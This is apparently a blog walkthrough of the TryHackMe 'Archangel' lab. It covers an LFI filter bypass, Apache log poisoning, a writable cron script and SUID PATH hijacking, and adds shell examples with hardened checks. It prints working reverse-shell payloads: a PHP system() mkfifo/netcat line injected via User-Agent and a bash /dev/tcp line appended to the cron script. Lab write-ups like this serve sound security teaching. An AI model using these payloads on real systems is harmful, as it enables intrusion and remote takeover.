July 1, 2026
Archangel TryHackMe Walkthrough | LFI, Log Poisoning & Linux Privilege Escalation Explained
Hello everyone,
By TibeRius_12
5 min read
My name is TibeRius_12. Today we will be covering another THM room named Archangel.
The main objective of this room is to exploit a web application vulnerability and then escalate privileges. The challenge is divided into three parts: 1. boot up the machine, 2. get a shell, and 3. root the machine.
- Enumeration
After booting up the machine, the first step is to enumerate all services running on the target VM using nmap.
nmap -sV
- -sV — Probes the open ports to identify the service and version running on each
Since an HTTP service was exposed, I started enumerating the web server's directories and files with gobuster.
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://
- dir — Directory
- -w — specifying wordlists
- -u — URL of target website
I saw a /Flags directory, so I opened it in Firefox in the hope of getting the flag. And my reaction was "AHH! I got rickrolled😬"
Not losing hope, I browsed all the other directories in search of a flag, but was disappointed. Interestingly, I noticed a company name on the index page, and that was the answer to the first question.
- Question-1 — Find a different hostname
I added that hostname to the /etc/hosts file of my attack box, browsed the site again using the name followed by ".thm", and found a flag on the new virtual host.
- Question-2 — Find Flag 1
So I ran gobuster again (same command as above) to see whether the new virtual host exposed any other files or directories, and found robots.txt. It listed a disallowed path, so there is some page the site does not want indexed.
3. Gaining access
- Question-3 — Look for a page under development
Moving on, I reached a page with a button that redirects to another page. Looking at the resulting URL, the page was passed as a file path in the view parameter, which suggested a Local File Inclusion (LFI) vulnerability.
To read about LFI vulnerability, you can visit this article https://www.invicti.com/learn/local-file-inclusion-lfi
Trying a plain "../" traversal returned the error "Sorry, method not allowed". Inspecting the page source, I found two filters applied to the view parameter:
- The value must contain /var/www/development_testing/
- The value must not contain the string "../.."
So I modified the URL to use "..//" instead. Path resolution in Linux collapses repeated slashes, so "..//" climbs one directory exactly like "../", yet the literal string "../.." never appears and the second filter never fires. The URL became:
- http://.thm/.php?view=/var/www/development_testing/..//..//..//..//etc/passwd
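To see exactly why the "..//" variant slips through, here is an added shell example (my code, not the room's PHP source or the author's notes). It reproduces the two string checks described above as I read them, normalizes the path the way the kernel will when the file is opened, and shows the hardened check a developer should have used instead: normalize first, then verify the result is still inside the allowed directory. The file name page.php is a placeholder.

```shell
#!/bin/sh
# Added example: the two string filters described above, written in shell so the
# bypass can be traced by hand. Not the room's real PHP code.

# Weak filter (as described): must contain the base directory, must not contain
# the literal string "../..". Returns 0 = allowed, 1 = blocked.
weak_filter() {
    case $1 in
        */var/www/development_testing/*) ;;
        *) return 1 ;;
    esac
    case $1 in
        *../..*) return 1 ;;
    esac
    return 0
}

# Lexical path normalization: drops empty components (from "//"), drops ".",
# and resolves ".." against the components before it. This mirrors what the
# kernel does when the file is opened; it does not follow symlinks (realpath would).
lexical_normalize() {
    rest=$1 out=
    while [ -n "$rest" ]; do
        seg=${rest%%/*}
        case $rest in
            */*) rest=${rest#*/} ;;
            *)   rest= ;;
        esac
        case $seg in
            ''|.) ;;                  # "//" or "/./" contributes nothing
            ..)   out=${out%/*} ;;    # climb one directory
            *)    out="$out/$seg" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
}

# Hardened filter: normalize first, then require the result to still be inside
# the allowed directory. Returns 0 = allowed, 1 = blocked.
hardened_filter() {
    case $(lexical_normalize "$1") in
        /var/www/development_testing/?*) return 0 ;;
        *) return 1 ;;
    esac
}

# Reports what each filter does with a candidate and which file would really be opened.
classify() {
    if weak_filter "$1"; then w=allowed; else w=blocked; fi
    if hardened_filter "$1"; then h=allowed; else h=blocked; fi
    printf 'weak=%s hardened=%s opens=%s\n' "$w" "$h" "$(lexical_normalize "$1")"
}

classify '/var/www/development_testing/page.php'
classify '/var/www/development_testing/../../../../etc/passwd'
classify '/var/www/development_testing/..//..//..//..//etc/passwd'
```

The third call is the interesting one: the weak filter allows it, yet the path that actually gets opened is /etc/passwd. Checking the normalized path against the allowed prefix, as the hardened filter does, catches both traversal variants; a real implementation would normalize with realpath so symlinks are resolved as well.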
Next I pointed the include at /var/log/apache2/access.log to see what gets recorded there. Apache logs the request line and the User-Agent header of every request verbatim, so anything I send ends up in a file that the vulnerable page will include and execute as PHP.
Putting the PHP payload in the request URL did not work, so I sent it in the User-Agent header instead. The payload is the standard mkfifo netcat reverse shell wrapped in a PHP system() call:
- <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.48.71.157 1234 >/tmp/f') ?>
After a few tries (once the payload is in the log, the log has to be requested through the LFI again for it to execute), I received a connection on my listener:
- nc -nlvp 1234
- -n — Prevents DNS lookups, speeding up connections.
- -l — Tells Netcat to listen for incoming connections rather than initiating one.
- -v — Enables verbose output so you can see details when a connection is made.
- -p — Specifies the exact port to listen on
From /etc/passwd, read earlier through the LFI, I already knew there was a user named archangel. The permissions on /home/archangel allowed read access for other users and groups, so I could open user.txt and read the flag.
- Question-4 — Find Flag 2
- Question-5 — Get a shell and find the user flag
4. Horizontal Privilege Escalation
- Question-6 — Get User 2 flag
We have no password, hash, or password file, yet we need to move sideways to the archangel user. Exploring the target, I found a script that a cron job runs as archangel at a regular interval. Its contents were:
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt
The script was writable by my low-privileged user, which is the whole problem: anything appended to it runs as archangel on the next scheduled execution. So I appended a reverse shell one-liner. Appending with >> keeps the original line intact, so the job keeps doing its normal work and nothing looks broken; /dev/tcp and >& are bash features, which is fine here because the script's shebang is /bin/bash.
- echo 'sh -i >& /dev/tcp/10.48.71.157/2234 0>&1' >> helloworld.sh
On the next run the job connected back to my netcat listener on port 2234 as archangel, and the flag was in user2.txt.
- nc -nlvp 2234
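As an added check (my code, not the author's), here is a small shell function that scans a system-format crontab for referenced files the current user can write to, which is exactly the condition this step relied on. The sample crontab it builds is constructed to mirror the schedule described above; the paths and the second job are placeholders.

```shell
#!/bin/sh
# Added example: find files referenced from a system-format crontab
# (min hour dom mon dow user command...) that the current user can modify.
# Any hit is a candidate for the "append a reverse shell" trick used above.

writable_cron_targets() {
    # $1 = path to a crontab in system format (with a user field)
    crontab_file=$1
    set -f                                # no globbing: "*" fields must stay literal
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in
            ''|'#'*) continue ;;          # blank lines and comments
        esac
        set -- $line                      # split into fields on whitespace
        [ $# -ge 7 ] || continue          # "PATH=..." style assignments have one field
        user=$6
        shift 6
        for word in "$@"; do              # report every word that is a writable file
            if [ -f "$word" ] && [ -w "$word" ]; then
                printf '%s %s\n' "$user" "$word"
            fi
        done
    done < "$crontab_file"
    set +f
}

# Builds a constructed crontab and script in a temp directory and runs the check.
cron_demo() {
    work=$(mktemp -d)
    # Stand-in for the script found in the room: world-writable, run as archangel.
    printf '#!/bin/bash\necho "hello world" >> %s/helloworld.txt\n' "$work" > "$work/helloworld.sh"
    chmod 777 "$work/helloworld.sh"
    # Constructed crontab; the second job points at a path that does not exist.
    cat > "$work/crontab" <<EOF
# m h dom mon dow user command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * archangel $work/helloworld.sh
*/15 * * * * root /nonexistent/backup.sh
EOF
    writable_cron_targets "$work/crontab"
    rm -rf "$work"
}

cron_demo
```

On a real target, run it against /etc/crontab and the files under /etc/cron.d, and remember that the check is a heuristic: it looks at every word of the command, so an interpreter such as /bin/bash will also be reported if you happen to be root.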
5. Vertical Privilege Escalation
Root the machine and find the root flag
Vertical privilege escalation here is a bit trickier, because it relies on how Linux locates executable files. When a program runs a command such as cp without giving its full path (for example /bin/cp), the shell searches the directories listed in the PATH environment variable from left to right and runs the first match it finds.
If an attacker can place a malicious executable named cp in a writable directory, put that directory at the front of PATH, and a SUID program invokes cp by bare name, the attacker's cp runs instead of the legitimate one. Because the SUID binary runs with the effective UID of its owner (root, in this case), the fake cp inherits those privileges and yields a root shell. Two practical caveats: the trick only works if the SUID program passes the caller's environment, PATH included, through to the command it spawns, and a fake cp that launches bash should use bash -p, since bash otherwise drops the effective UID back to the real one.
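To make the mechanism concrete, here is an added shell example (mine, not the room's SUID binary) that reproduces PATH hijacking safely: nothing is SUID and everything lives in a temporary directory, so it can be run as an unprivileged user. It pairs a vulnerable stand-in that calls cp by bare name with a hardened one that uses an absolute path and a fixed PATH, and includes a helper that shows which file a given PATH would resolve a command to.

```shell
#!/bin/sh
# Added example: PATH hijacking reproduced without any SUID bit. The stand-ins
# below only show why a bare "cp" is dangerous and what the fix looks like.

# Stand-in for the vulnerable program: calls cp by bare name, so the caller's
# PATH decides which file actually runs.
vulnerable_backup() {
    cp "$1" "$2"
}

# Hardened stand-in: absolute path and a fixed PATH for the spawned command.
# (In C the equivalent is execve("/bin/cp", ...) with a sanitized environment,
# or setting PATH explicitly before calling system().)
hardened_backup() {
    PATH=/usr/bin:/bin /bin/cp "$1" "$2"
}

# Shows which file a given PATH string resolves a command name to; useful when
# checking whether a writable directory sits in front of /bin.
resolve_in_path() {
    name=$1 rest=$2
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        case $rest in *:*) rest=${rest#*:} ;; *) rest= ;; esac
        [ -n "$dir" ] || dir=.        # an empty PATH entry means the current directory
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# Runs both stand-ins with an attacker-controlled directory first in PATH and
# reports "vulnerable=<hijacked|copied> hardened=<hijacked|copied>".
hijack_demo() {
    work=$(mktemp -d)
    printf 'original data\n' > "$work/src"
    mkdir "$work/evil"
    # The fake cp. Against a real SUID-root binary this would be something like
    # "/bin/bash -p" (bash drops the effective UID without -p); here it only
    # leaves a marker file so we can see that it ran instead of the real cp.
    printf '#!/bin/sh\n: > "%s/hijacked"\n' "$work" > "$work/evil/cp"
    chmod 755 "$work/evil/cp"

    saved_path=$PATH
    PATH="$work/evil:$PATH"; export PATH
    hash -r 2>/dev/null || :          # forget any cached location of cp

    vulnerable_backup "$work/src" "$work/out1" || :
    if [ -e "$work/hijacked" ]; then v=hijacked; else v=copied; fi
    rm -f "$work/hijacked" "$work/out1"

    hardened_backup "$work/src" "$work/out2"
    if [ -e "$work/hijacked" ]; then
        h=hijacked
    elif [ "$(cat "$work/out2")" = 'original data' ]; then
        h=copied
    else
        h=failed
    fi

    PATH=$saved_path; export PATH
    hash -r 2>/dev/null || :
    rm -rf "$work"
    printf 'vulnerable=%s hardened=%s\n' "$v" "$h"
}

hijack_demo
```

The vulnerable stand-in never copies anything because the shell picks up the fake cp first; the hardened one is unaffected by the poisoned PATH. When auditing a SUID binary, run strings on it and look for bare command names, then confirm with resolve_in_path (or command -v) where those names would be resolved from under your PATH.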
This was the challenge — Archangel.
- Never trust input validation alone. Weak filtering allowed a Local File Inclusion (LFI) vulnerability to be bypassed using directory traversal techniques.
- Log poisoning can transform an LFI into Remote Code Execution (RCE). Injecting PHP code into the Apache access log and including it through the vulnerable parameter resulted in a reverse shell.
- Post-exploitation requires thorough enumeration. Exploring cron jobs, file permissions, and scheduled scripts uncovered an opportunity for horizontal privilege escalation.
- Misconfigured executable paths can lead to privilege escalation. A SUID binary that relied on the PATH environment variable enabled PATH hijacking and ultimately root access.
- Small misconfigurations rarely exist in isolation. Individually, each weakness appeared minor, but chaining them together resulted in complete system compromise.
Hope you like the walkthrough. I'll be covering more challenges soon.
Till then, happy hacking.😉
About the Author
Hi, I'm TibeRius_12, a master's student in Cybersecurity and an aspiring penetration tester. I document my journey through TryHackMe labs, Active Directory, web security, and practical VAPT methodologies. If you enjoy hands-on cybersecurity content, feel free to follow me for future write-ups.